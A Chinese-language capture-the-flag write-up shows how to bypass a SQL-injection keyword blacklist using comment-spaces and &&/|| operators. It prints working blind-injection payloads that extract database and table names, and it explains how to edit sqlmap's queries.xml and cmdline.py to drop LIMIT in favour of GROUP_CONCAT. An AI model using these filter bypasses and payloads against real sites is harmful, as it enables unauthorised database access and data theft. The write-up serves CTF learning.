sqlmap使用心得——编写自己查询语句
0x00 从一道CTF题目入手
- 我们看他的过滤
// 防注入
$blacklist = array(" select "," union ","limit", " from ", "and","sleep");
//var_dump($blacklist);
- 我们可以使用 /**/ 代替空格 , && 代替 and , || 代替 or 进行绕过,所以我们提交的为:
回显:
再提交:
回显:
好的,我们已经找到注入点了,affff'||1# 或者 admin'&&1# ,admin为已注册用户名
那我们用sqlmap跑一下吧:
成功。这里我没有加查询数据,现在我来查一下数据库名 -v 3 --dbs。
可以看到,sqlmap自带的查询语句含有limit这是题目所不允许的,虽然还是查出了表名,但是使用的PAYLOAD 是
[PAYLOAD] admin'/**/&&/**/ORD(MID((IFNULL(CAST(DATABASE()/**/AS/**/CHAR),0x20)),1,1))>64#
也只查出当前数据库的名字:
好的,你说只要当前数据库的名字,那表名呢?我们来查一下表名 -D software --tables
结果很遗憾,我们来看一下他的payload吧
[11:53:37] [PAYLOAD] admin'/**/&&/**/ORD(MID((SELECT/**/IFNULL(CAST(table_name/**/AS/**/CHAR),0x20)/**/FROM/**/INFORMATION_SCHEMA.TABLES/**/WHERE/**/table_schema=0x736f667477617265/**/LIMIT/**/2,1),1, 1))>1#
该死的limit,那我自己写个盲注脚本行了吧。当然,这确实是另一种解决办法,但是这里我们不写脚本,那能不能让sqlmap人性化一点,按我们的想要的方式来?
0x01 调改sqlmap
打开sqlmap所在的文件夹,如果你对他的文件结构熟悉的话,应该知道payload什么的都在xml这个文件夹,我翻了一下,确定关键在 queries.xml 这个文件。
看一下这个文件。
上面的value 应该是说明使用对象,下面<>里面的内容,是参数名和查询语句,我们先找到dbs,进行测试一下。
<dbs>
<inband query="SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA" query2="SELECT db FROM mysql.db"/>
<blind query="SELECT DISTINCT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT %d,1" query2="SELECT DISTINCT(db) FROM mysql.db LIMIT %d,1" count="SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA" count2="SELECT COUNT(DISTINCT(db)) FROM mysql.db"/>
</dbs>
OK 这就是dbs,我们改一下,把盲注 bind query的 select 改成 testtest 看一下sqlmap的反应。
OK,现在我们可以百分百确定,sqlmap调用的查询就是这里了!
现在开始我们的调试。
不是过滤了limit么,那我们去掉limit。去掉limit的话,那就会产生多条查询结果,那我们应该还要加一个group_concat()
所以我们改成这样:
<blind query="SELECT Group_concat(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA" query2="SELECT DISTINCT(db) FROM mysql.db LIMIT %d,1" count="SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA" count2="SELECT COUNT(DISTINCT(db)) FROM mysql.db"/>
结果发现我太天真,报错了:
让我们回到那个语句,仔细看一下:
<blind query="SELECT Group_concat(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA" query2="SELECT DISTINCT(db) FROM mysql.db LIMIT %d,1" count="SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA" count2="SELECT COUNT(DISTINCT(db)) FROM mysql.db"/>
这里有一个count参数会不会是这个的问题?这count算出来的应该是查询结果的个数,如果我们使用group_concat的话,那结果就只有一条。那我们直接 selelct 1 试一下。所以我们修改:
count="select 1"
叹气:
还是报错,难道不能直接删掉limit 么,或者说,我们删掉了一个%d 参数引起了错误? 那我们把%d 参数加回去试试。
这里我们使用无伤大雅的concat的加回去吧。
<blind query="SELECT CONCAT(GROUP_CONCAT(schema_name),%d) FROM INFORMATION_SCHEMA.SCHEMATA" count="SELECT 1"/>
Yes Make it
[14:14:05] [PAYLOAD] admin'/**/&&/**/ORD(MID((SELECT/**/IFNULL(CAST(CONCAT(GROUP_CONCAT(schema_name),0)/**/AS/**/CHAR),0x20)/**/FROM/**/INFORMATION_SCHEMA.SCHEMATA),179,1))>47#
[14:14:05] [PAYLOAD] admin'/**/&&/**/ORD(MID((SELECT/**/IFNULL(CAST(CONCAT(GROUP_CONCAT(schema_name),0)/**/AS/**/CHAR),0x20)/**/FROM/**/INFORMATION_SCHEMA.SCHEMATA),180,1))>47#
[14:14:05] [PAYLOAD] admin'/**/&&/**/ORD(MID((SELECT/**/IFNULL(CAST(CONCAT(GROUP_CONCAT(schema_name),0)/**/AS/**/CHAR),0x20)/**/FROM/**/INFORMATION_SCHEMA.SCHEMATA),180,1))>1#
成了
所以总结就是:
- %d %s等参数一个都不能少,少了就会报错
- count 参数是计算查询结果条数,如果采用的是group_conat(),那count="select 1" 就好
0x02 添加参数和直接的查询语句
哇,这么麻烦,还不如我自己直接写脚本呢。确实,我也觉得有点麻烦,那能不能我就写个查询语句然后sqlmap给我查呢?Let's do this!
先想一下,我们要给自己的语句进行查询,那先要给自己的语句添加个参数吧, 比如 --test
我想到了最简单的查询当前数据库的语句, --current-db ,在xml文件当中,他是这样的:
<current_db query="DATABASE()"/>
我进行了一番摸索之后,发现最后是在 lib/parse/cmdline.py这个文件里面进行定义的。下面我直接给出修改结果了。
lib/parse/cmdline.py
enumeration.add_option("--current-db", dest="getCurrentDb",
action="store_true",
help="Retrieve DBMS current database")
enumeration.add_option("--test", dest="getCurrentDb",
action="store_true",
help="Retrieve DBMS current database")
queries.xml文件,将"<current_db query="DATABASE()"/>" 改成你想要的查询语句
<current_db query="(select group_concat(table_name) from information_schema.tables where table_schema=database())"/>
这里是一个查询当前数据库表的语句,让我们看一下效果。
成功查询除了表名,所以我们在这里只需要替换我们需要查询语句就Ok了。
这里我们借用的是current-db,本来我考虑是添加自己的参数,但是我花了大量时间尝试改了五六个文件还是会报错,是在想不到是哪里出错了。如果有大神知道,还望不吝赐教。
0x03 最后
- 如果觉得sqlmap的语句太过繁琐,可以直接在queries.xml文件,将cast 和 isnull 的query 改成 %s
<cast query1="CAST(%s AS CHAR)" query="%s"/>
<isnull query1="IFNULL(%s,' ')" query="%s"/>
- 如果题目过滤了or,那么slqmap截取字符串的姿势就无法使用,可以改一下inference,
<inference query="ASCII(SUBSTRING((%s),%d,1))>%d"/>
效果:
